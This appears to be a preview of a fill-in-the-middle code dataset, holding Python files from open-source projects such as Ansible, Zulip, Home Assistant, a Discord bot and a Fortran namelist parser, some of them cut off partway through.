| Column | Type | Range |
|---|---|---|
| repo_name | string | 5–100 chars |
| path | string | 4–231 chars |
| language | string | 1 class |
| license | string | 15 classes |
| size | int64 | 6–947k |
| score | float64 | 0–0.34 |
| prefix | string | 0–8.16k chars |
| middle | string | 3–512 chars |
| suffix | string | 0–8.17k chars |
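The rows that follow are fill-in-the-middle samples: each record carries its repository metadata plus a prefix, a middle span, and a suffix cut from one Python file. A minimal sketch, assuming each record is exposed as a plain dict keyed by the column names above and that the three text columns concatenate back to the original file (the `reassemble` helper and the shortened `sample` values are hypothetical, for illustration only):

```python
# Minimal sketch: rebuild one fill-in-the-middle record into full source text.
# Assumes a dict record keyed by the column names listed above (hypothetical helper).
def reassemble(record: dict) -> str:
    # The middle span is the piece a model would be asked to infill
    # between the surrounding prefix and suffix.
    return record["prefix"] + record["middle"] + record["suffix"]

# Shortened, illustrative values based on the first row below.
sample = {
    "repo_name": "ProjectSWGCore/NGECore2",
    "path": "scripts/mobiles/generic/faction/rebel/battle_droid_rebel.py",
    "prefix": "weapontemplate = WeaponTemplate('...shared_carbine_e5.iff', Weap",
    "middle": "onType.CARBINE, 1.0, 15, 'energy')",
    "suffix": "\nweaponTemplates.add(weapontemplate)\n",
}
print(reassemble(sample))  # prints the snippet with 'WeaponType' rejoined
```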
| ProjectSWGCore/NGECore2 | scripts/mobiles/generic/faction/rebel/battle_droid_rebel.py | Python | lgpl-3.0 | 1,397 | 0.029349 |
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from resources.datatables import FactionStatus
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('rebel_battle_droid')
mobileTemplate.setLevel(83)
mobileTemplate.setDifficulty(Difficulty.ELITE)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(True)
mobileTemplate.setScale(1)
mobileTemplate.setSocialGroup("rebel")
mobileTemplate.setAssistRange(24)
mobileTemplate.setStalker(False)
mobileTemplate.setFaction("rebel")
mobileTemplate.setFactionStatus(FactionStatus.Combatant)
templates = Vector()
templates.add('object/mobile/shared_battle_droid.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/ranged/carbine/shared_carbine_e5.iff', WeaponType.CARBINE, 1.0, 15, 'energy')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('rangedShot')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('battle_droid_rebel', mobileTemplate)
return
| muravjov/ansible | lib/ansible/utils/__init__.py | Python | gpl-3.0 | 60,718 | 0.004957 |
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import errno
import sys
import re
import os
import shlex
import yaml
import copy
import optparse
import operator
from ansible import errors
from ansible import __version__
from ansible.utils.display_functions import *
from ansible.utils.plugins import *
from ansible.utils.su_prompts import *
from ansible.utils.hashing import secure_hash, secure_hash_s, checksum, checksum_s, md5, md5s
from ansible.callbacks import display
from ansible.module_utils.splitter import split_args, unquote
from ansible.module_utils.basic import heuristic_log_sanitize
from ansible.utils.unicode import to_bytes, to_unicode
import ansible.constants as C
from . import pybook
import ast
import pprint
import time
import StringIO
import stat
import termios
import tty
import pipes
import random
import difflib
import warnings
import traceback
import getpass
import sys
import subprocess
import contextlib
from vault import VaultLib
VERBOSITY=0
MAX_FILE_SIZE_FOR_DIFF=1*1024*1024
# caching the compilation of the regex used
# to check for lookup calls within data
LOOKUP_REGEX = re.compile(r'lookup\s*\(')
PRINT_CODE_REGEX = re.compile(r'(?:{[{%]|[%}]})')
CODE_REGEX = re.compile(r'(?:{%|%})')
try:
# simplejson can be much faster if it's available
import simplejson as json
except ImportError:
import json
try:
from yaml import CSafeLoader as Loader
except ImportError:
from yaml import SafeLoader as Loader
PASSLIB_AVAILABLE = False
try:
import passlib.hash
PASSLIB_AVAILABLE = True
except:
pass
try:
import builtin
except ImportError:
import __builtin__ as builtin
KEYCZAR_AVAILABLE=False
try:
try:
# some versions of pycrypto may not have this?
from Crypto.pct_warnings import PowmInsecureWarning
except ImportError:
PowmInsecureWarning = RuntimeWarning
with warnings.catch_warnings(record=True) as warning_handler:
warnings.simplefilter("error", PowmInsecureWarning)
try:
import keyczar.errors as key_errors
from keyczar.keys import AesKey
except PowmInsecureWarning:
system_warning(
"The version of gmp you have installed has a known issue regarding " + \
"timing vulnerabilities when used with pycrypto. " + \
"If possible, you should update it (i.e. yum update gmp)."
)
warnings.resetwarnings()
warnings.simplefilter("ignore")
import keyczar.errors as key_errors
from keyczar.keys import AesKey
KEYCZAR_AVAILABLE=True
except ImportError:
pass
###############################################################
# Abstractions around keyczar
###############################################################
def key_for_hostname(hostname):
# fireball mode is an implementation of ansible firing up zeromq via SSH
# to use no persistent daemons or key management
if not KEYCZAR_AVAILABLE:
raise errors.AnsibleError("python-keyczar must be installed on the control machine to use accelerated modes")
key_path = os.path.expanduser(C.ACCELERATE_KEYS_DIR)
if not os.path.exists(key_path):
os.makedirs(key_path, mode=0700)
os.chmod(key_path, int(C.ACCELERATE_KEYS_DIR_PERMS, 8))
elif not os.path.isdir(key_path):
raise errors.AnsibleError('ACCELERATE_KEYS_DIR is not a directory.')
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_DIR_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the private key directory. Use `chmod 0%o %s` to correct this issue, and make sure any of the keys files contained within that directory are set to 0%o' % (int(C.ACCELERATE_KEYS_DIR_PERMS, 8), C.ACCELERATE_KEYS_DIR, int(C.ACCELERATE_KEYS_FILE_PERMS, 8)))
key_path = os.path.join(key_path, hostname)
# use new AES keys every 2 hours, which means fireball must not allow running for longer either
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
key = AesKey.Generate()
fd = os.open(key_path, os.O_WRONLY | os.O_CREAT, int(C.ACCELERATE_KEYS_FILE_PERMS, 8))
fh = os.fdopen(fd, 'w')
fh.write(str(key))
fh.close()
return key
else:
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_FILE_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the key file for this host. Use `chmod 0%o %s` to correct this issue.' % (int(C.ACCELERATE_KEYS_FILE_PERMS, 8), key_path))
fh = open(key_path)
key = AesKey.Read(fh.read())
fh.close()
return key
def encrypt(key, msg):
return key.Encrypt(msg)
def decrypt(key, msg):
try:
return key.Decrypt(msg)
except key_errors.InvalidSignatureError:
raise errors.AnsibleError("decryption failed")
###############################################################
# UTILITY FUNCTIONS FOR COMMAND LINE TOOLS
###############################################################
def read_vault_file(vault_password_file):
"""Read a vault password from a file or if executable, execute the script and
retrieve password from STDOUT
"""
if vault_password_file:
this_path = os.path.realpath(os.path.expanduser(vault_password_file))
if is_executable(this_path):
try:
# STDERR not captured to make it easier for users to prompt for input in their scripts
p = subprocess.Popen(this_path, stdout=subprocess.PIPE)
except OSError, e:
raise errors.AnsibleError("problem running %s (%s)" % (' '.join(this_path), e))
stdout, stderr = p.communicate()
vault_pass = stdout.strip('\r\n')
else:
try:
f = open(this_path, "rb")
vault_pass=f.read().strip()
f.close()
except (OSError, IOError), e:
raise errors.AnsibleError("Could not read %s: %s" % (this_path, e))
return vault_pass
else:
return None
def err(msg):
''' print an error message to stderr '''
print >> sys.stderr, msg
def exit(msg, rc=1):
''' quit with an error to stdout and a failure code '''
err(msg)
sys.exit(rc)
def jsonify(result, format=False):
''' format JSON output (uncompressed or pretty-printed) '''
if result is None:
return "{}"
result2 = result.copy()
for key, value in result2.items():
if type(value) is str:
result2[key] = value.decode('utf-8', 'ignore')
indent = None
if format:
indent = 4
try:
return json.dumps(result2, sort_keys=True, indent=indent, ensure_ascii=False)
except UnicodeDecodeError:
return json.dumps(result2, sort_keys=True, indent=indent)
def write_tree_file(tree, hostname, buf):
''' write something into treedir/hostname '''
# TODO: might be nice to append playbook runs per host in a similar way
# in which case, we'd want append mode.
path = os.path.join(tree, hostname)
fd = open(path, "w+")
fd.write(buf)
fd.close()
def is_failed(result):
''' is a given JSON result a failed result? '''
return ((result.get('rc', 0) != 0) or (result.get('failed', False) in [ True, 'True', 'true']))
def is_changed(result):
''' is a given JSON result a changed result? '''
return (result.get('changed', False) in [ True, 'True', 'true'])
| Diptanshu8/zulip | zerver/views/webhooks/taiga.py | Python | apache-2.0 | 11,660 | 0.00446 |
"""
Taiga integration for Zulip.
Tips for notification output:
*Emojis*: most of the events have specific emojis e.g.
- :notebook: - change of subject/name/description
- :chart_with_upwards_trend: - change of status
etc. If there's no meaningful emoji for a certain event, the defaults are used:
- :thought_balloon: - event connected to commenting
- :busts_in_silhouette: - event connected to a certain user
- :package: - all other events connected to user story
- :calendar: - all other events connected to milestones
- :clipboard: - all other events connected to tasks
- :bulb: - all other events connected to issues
*Text formatting*: if there has been a change of a property, the new value should always be in bold; otherwise the
subject of US/task should be in bold.
"""
from __future__ import absolute_import
from typing import Any, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.http import HttpRequest, HttpResponse
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success, json_error
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile, Client
import ujson
from six.moves import range
@api_key_only_webhook_view('Taiga')
@has_request_variables
def api_taiga_webhook(request, user_profile, client, message=REQ(argument_type='body'),
stream=REQ(default='taiga'), topic=REQ(default='General')):
# type: (HttpRequest, UserProfile, Client, Dict[str, Any], Text, Text) -> HttpResponse
parsed_events = parse_message(message)
content_lines = []
for event in parsed_events:
content_lines.append(generate_content(event) + '\n')
content = "".join(sorted(content_lines))
check_send_message(user_profile, client, 'stream', [stream], topic, content)
return json_success()
templates = {
'userstory': {
'create': u':package: %(user)s created user story **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned user story **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned user story **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned user story **%(subject)s**'
' from %(old)s to %(new)s.',
'points': u':game_die: %(user)s changed estimation of user story **%(subject)s**.',
'blocked': u':lock: %(user)s blocked user story **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked user story **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added user story **%(subject)s** to sprint %(new)s.',
'unset_milestone': u':calendar: %(user)s removed user story **%(subject)s** from sprint %(old)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of user story **%(subject)s** from %(old)s'
' to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of user story **%(subject)s**'
' from %(old)s to %(new)s.',
'closed': u':checkered_flag: %(user)s closed user story **%(subject)s**.',
'reopened': u':package: %(user)s reopened user story **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed user story from %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of user story **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on user story **%(subject)s**.',
'delete': u':x: %(user)s deleted user story **%(subject)s**.'
},
'milestone': {
'create': u':calendar: %(user)s created sprint **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed sprint from %(old)s to **%(new)s**.',
'estimated_start': u':calendar: %(user)s changed estimated start of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'estimated_finish': u':calendar: %(user)s changed estimated finish of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'delete': u':x: %(user)s deleted sprint **%(subject)s**.'
},
'task': {
'create': u':clipboard: %(user)s created task **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned task **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned task **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned task **%(subject)s**'
' from %(old)s to %(new)s.',
'blocked': u':lock: %(user)s blocked task **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked task **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added task **%(subject)s** to sprint %(new)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of task **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of task **%(subject)s**'
' from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed task %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of task **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on task **%(subject)s**.',
'delete': u':x: %(user)s deleted task **%(subject)s**.',
'changed_us': u':clipboard: %(user)s moved task **%(subject)s** from user story %(old)s to %(new)s.'
},
'issue': {
'create': u':bulb: %(user)s created issue **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned issue **%(subject)s** to %(new)s.', #
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned issue **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_priority': u':rocket: %(user)s changed priority of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_severity': u':warning: %(user)s changed severity of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_type': u':bulb: %(user)s changed type of issue **%(subject)s** from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed issue %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of issue **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on issue **%(subject)s**.',
'delete': u':x: %(user)s deleted issue **%(subject)s**.'
},
}
def get_old_and_new_values(change_type, message):
# type: (str, Mapping[str, Any]) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]]]
""" Parses the payload and finds previous and current value of change_type."""
if change_type in ['subject', 'name', 'estimated_finish', 'estimated_start']:
old = message["change"]["diff"][change_type]["from"]
new = message["change"]["diff"][change_type]["to"]
return old, new
try:
old = message["change"]["diff"][change_type]["from"]
except KeyError:
old = None
try:
new = message["change"]["diff"][change_type]["to"]
except KeyError:
new = None
return old, new
def parse_comment(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses the comment to issue, task or US. """
return {
'event': 'commented',
'type': message["type"],
'values': {
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_create_or_delete(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses create or delete event. """
return {
'type': message["type"],
'event': message["action"],
'values':
{
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
d
| rht/universe | universe/remotes/compose/colors.py | Python | mit | 860 | 0 |
from __future__ import absolute_import
from __future__ import unicode_literals
NAMES = [
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
def get_pairs():
for i, name in enumerate(NAMES):
yield(name, str(30 + i))
yield('intense_' + name, str(30 + i) + ';1')
def ansi(code):
return '\033[{0}m'.format(code)
def ansi_color(code, s):
return '{0}{1}{2}'.format(ansi(code), s, ansi(0))
def make_color_fn(code):
return lambda s: ansi_color(code, s)
for (name, code) in get_pairs():
globals()[name] = make_color_fn(code)
def rainbow():
cs = ['cyan', 'yellow', 'green', 'magenta', 'red', 'blue',
'intense_cyan', 'intense_yellow', 'intense_green',
'intense_magenta', 'intense_red', 'intense_blue']
for c in cs:
yield globals()[c]
| DTUWindEnergy/Python4WindEnergy | py4we/fortran_namelist_io.py | Python | apache-2.0 | 8,294 | 0.01278 |
""" IO classes for Omnivor input file
Copyright (C) 2013 DTU Wind Energy
Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013
Namelist IO: basic functions to read and parse a fortran file into a python dictionary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
__author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
__version__ = '$Revision: 1.0 $'[11:-2]
__date__ = '$Date: 2006/09/05 21:16:24 $'
__copyright__ = 'Copyright (c) 2006 RPN'
__license__ = 'LGPL'
Recognizes files of the form:
&namelistname
opt1 = value1
...
/
"""
from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest
import numpy as np
import os.path as path
import sys
import re
import tempfile
import os
__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
"""
Fortran Namelist IO class
Scan a Fortran Namelist file and put Section/Parameters into a dictionary
Write the file back if needed.
"""
def _write(self):
""" Write a file (overrided)
"""
with open(self.filename, 'w') as f:
for nml in self.data :
f.write('&'+nml+'\n')
# Sorting dictionary data (in the same order as it was created, thanks to id)
SortedList = sorted(self.data[nml].items(), key=lambda(k, v): v['id'])
# for param in self.data[nml]:
for param in map(lambda(k,v):k,SortedList):
f.write(param+'='+','.join(self.data[nml][param]['val']))
if len(self.data[nml][param]['com']) >0:
f.write(' !'+self.data[nml][param]['com'])
f.write('\n')
f.write('/\n')
def _read(self):
""" Read the file (overrided)
"""
with open(self.filename, 'r') as f:
data = f.read()
varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
valueInt = re.compile(r'[+-]?[0-9]+')
valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
valueNumber = re.compile(r'\b(([\+\-]?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
spaces = r'[\s\t]*'
quote = re.compile(r"[\s\t]*[\'\"]")
namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")
#split sections/namelists
mynmlfile = {}
mynmlfileRaw = {}
mynmlname = ''
for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
if re.match(namelistname,item):
mynmlname = re.sub(namelistname,r"\1",item)
mynmlfile[mynmlname] = {}
mynmlfileRaw[mynmlname] = []
elif re.match(namlistend,item):
mynmlname = ''
else:
if mynmlname:
mynmlfileRaw[mynmlname].append(item)
#parse param in each section/namelist
for mynmlname in mynmlfile.keys():
#split strings
bb = []
for item in mynmlfileRaw[mynmlname]:
if item[0]!='!':
# discarding lines that starts with a comment
bb.extend(FortranNamelistIO.splitstring(item))
#split comma and =
aa = []
for item in bb:
if not re.match(quote,item):
aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
# aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
else:
aa.append(item)
del(bb)
aa = FortranNamelistIO.clean(aa,cleancomma=1)
myparname = ''
id_cum=0
for item in aa:
if re.search(paramname,item):
#myparname = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
myparname = re.sub(paramname,r"\1",item)
id_cum=id_cum+1
mynmlfile[mynmlname][myparname] = {
'val' : [],
'id' : id_cum,
'com' : ''
}
elif paramname:
# Storing comments
item2=item.split('!')
item=item2[0]
if len(item) > 1 :
mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
if re.match(valueBool,item):
if re.match(valueTrue,item):
mynmlfile[mynmlname][myparname]['val'].append('.true.')
else:
mynmlfile[mynmlname][myparname]['val'].append('.false.')
else:
# item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
mynmlfile[mynmlname][myparname]['val'].append(item.strip())
self.data=mynmlfile
# Accessor and mutator dictionary style
def __getitem__(self, key):
""" Transform the class instance into a dictionary."""
return self.data[key]
def __setitem__(self, key, value):
""" Transform the class instance into a dictionary."""
self.data[key] = value
#==== Helper functions for Parsing of files
@staticmethod
def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
"""
Remove leading and trailing blanks, comments/empty lines from a list of strings
mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
commentline: definition of commentline
spacemerge: if <>0, merge/collapse multi space
cleancomma: Remove leading and trailing commas
"""
aa = mystringlist
if cleancomma:
aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
if commentexpr:
aa = [re.sub(commentexpr,"",item).strip() for item in aa]
if spacemerge:
aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) <> 0]
else:
aa = [item.strip() for item in aa if len(item.strip()) <> 0]
return aa
@staticmethod
def splitstring(mystr):
"""
Split a string in a list of strings at quote boundaries
Input: String
Output: list of strings
"""
dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
#remove zerolenght items
mystrarr = [item for item in mystrarr if len(item) <> 0]
if len(mystrarr) > 1:
mystrarr2 = []
for item in mystrarr:
mystrarr2.extend(FortranNamelistIO.splitstring(item))
mystrarr = mystrarr2
return mystrarr
## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
""" Test class for MyFileType class """
test_file = './test/fortran/fortran_namelist.nml'
def test_output_identical(self):
InputFile=FortranNamelistIO(self.test_file)
test_fileout=tempfile.mkstemp()[1]
InputFile.write(test_fileout)
with open(self.test_file, 'r') as f:
data_expected = f.read()
with open(test_fileout, 'r') as f:
data_read = f.read()
try:
self.assertMultiLineEqual(data_read, data_expected)
finally:
os.remove(test_fileout)
def test_duplication(self):
self._test_duplication(FortranNamelistIO, self.test_file)
## Main function ---------------------------------------------------------
if __name__
| jawilson/home-assistant | tests/components/nws/test_config_flow.py | Python | apache-2.0 | 3,482 | 0 |
"""Test the National Weather Service (NWS) config flow."""
from unittest.mock import patch
import aiohttp
from homeassistant import config_entries
from homeassistant.components.nws.const import DOMAIN
async def test_form(hass, mock_simple_nws_config):
"""Test we get the form."""
hass.config.latitude = 35
hass.config.longitude = -90
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], {"api_key": "test"}
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "ABC"
assert result2["data"] == {
"api_key": "test",
"latitude": 35,
"longitude": -90,
"station": "ABC",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass, mock_simple_nws_config):
"""Test we handle cannot connect error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = aiohttp.ClientError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_error(hass, mock_simple_nws_config):
"""Test we handle unknown error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = ValueError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_already_configured(hass, mock_simple_nws_config):
"""Test we handle duplicate entries."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert len(mock_setup_entry.mock_calls) == 1
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == 0
| gems-uff/noworkflow | tests/test_disasm.py | Python | mit | 831 | 0.002407 |
def f(x=2):
return x
lis = [1]
dic = {
"x": 2
}
f(1) # call_function
f(*lis) # call_function_var
f(**dic) # call_function_kw
f(*[], **dic) # call_function_var_kw
class C(object): # call_function
def __enter__(self):
x = 1
return x
def __exit__(self, *args, **kwargs):
pass
def fn_dec(*args):
def dec(fn):
return fn
return dec
dec1 = fn_dec("1")
@fn_dec("2") # call_function
@dec1 # call_function
def fw(x):
return x
@fn_dec("2") # call_function
@dec1 # call_function
class D(object):
pass
[a for a in lis] # nothing
{a for a in lis} # call_function
{a: a for a in lis} # call_function
f(a for a in lis) # call_function gen, call_function
with C() as r: # WITH_CLEANUP
pass
assert True # nothing
assert True, "wat" # call_function
| apache/incubator-systemml | src/main/python/systemds/operator/algorithm/builtin/getAccuracy.py | Python | apache-2.0 | 1,549 | 0.002582 |
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
| guineawheek/Dozer | dozer/utils.py | Python | gpl-3.0 | 2,868 | 0.003138 |
"""Provides some useful utilities for the Discord bot, mostly to do with cleaning."""
import re
import discord
__all__ = ['clean', 'is_clean']
mass_mention = re.compile('@(everyone|here)')
member_mention = re.compile(r'<@\!?(\d+)>')
role_mention = re.compile(r'<@&(\d+)>')
channel_mention = re.compile(r'<#(\d+)>')
def clean(ctx, text=None, *, mass=True, member=True, role=True, channel=True):
"""Cleans the message of anything specified in the parameters passed."""
if text is None:
text = ctx.message.content
if mass:
cleaned_text = mass_mention.sub(lambda match: '@\N{ZERO WIDTH SPACE}' + match.group(1), text)
if member:
cleaned_text = member_mention.sub(lambda match: clean_member_name(ctx, int(match.group(1))), cleaned_text)
if role:
cleaned_text = role_mention.sub(lambda match: clean_role_name(ctx, int(match.group(1))), cleaned_text)
if channel:
cleaned_text = channel_mention.sub(lambda match: clean_channel_name(ctx, int(match.group(1))), cleaned_text)
return cleaned_text
def is_clean(ctx, text=None):
"""Checks if the message is clean already and doesn't need to be cleaned."""
if text is None:
text = ctx.message.content
return all(regex.search(text) is None for regex in (mass_mention, member_mention, role_mention, channel_mention))
def clean_member_name(ctx, member_id):
"""Cleans a member's name from the message."""
member = ctx.guild.get_member(member_id)
if member is None:
return '<@\N{ZERO WIDTH SPACE}%d>' % member_id
elif is_clean(ctx, member.display_name):
return member.display_name
elif is_clean(ctx, str(member)):
return str(member)
else:
return '<@\N{ZERO WIDTH SPACE}%d>' % member.id
def clean_role_name(ctx, role_id):
"""Cleans role pings from messages."""
role = discord.utils.get(ctx.guild.roles, id=role_id) # Guild.get_role doesn't exist
if role is None:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role_id
elif is_clean(ctx, role.name):
return '@' + role.name
else:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role.id
def clean_channel_name(ctx, channel_id):
"""Cleans channel mentions from messages."""
channel = ctx.guild.get_channel(channel_id)
if channel is None:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel_id
elif is_clean(ctx, channel.name):
return '#' + channel.name
else:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel.id
def pretty_concat(strings, single_suffix='', multi_suffix=''):
"""Concatenates things in a pretty way"""
if len(strings) == 1:
return strings[0] + single_suffix
elif len(strings) == 2:
return '{} and {}{}'.format(*strings, multi_suffix)
else:
return '{}, and {}{}'.format(', '.join(strings[:-1]), strings[-1], multi_suffix)
| armab/st2contrib | packs/jira/actions/transition_issue.py | Python | apache-2.0 | 269 | 0 |
from lib.base import BaseJiraAction
__all__ = [
'TransitionJiraIssueAction'
]
class TransitionJiraIssueAction(BaseJiraAction):
def run(self, issue_key, transition):
result = self._client.transition_issue(issue_key, transition)
return result
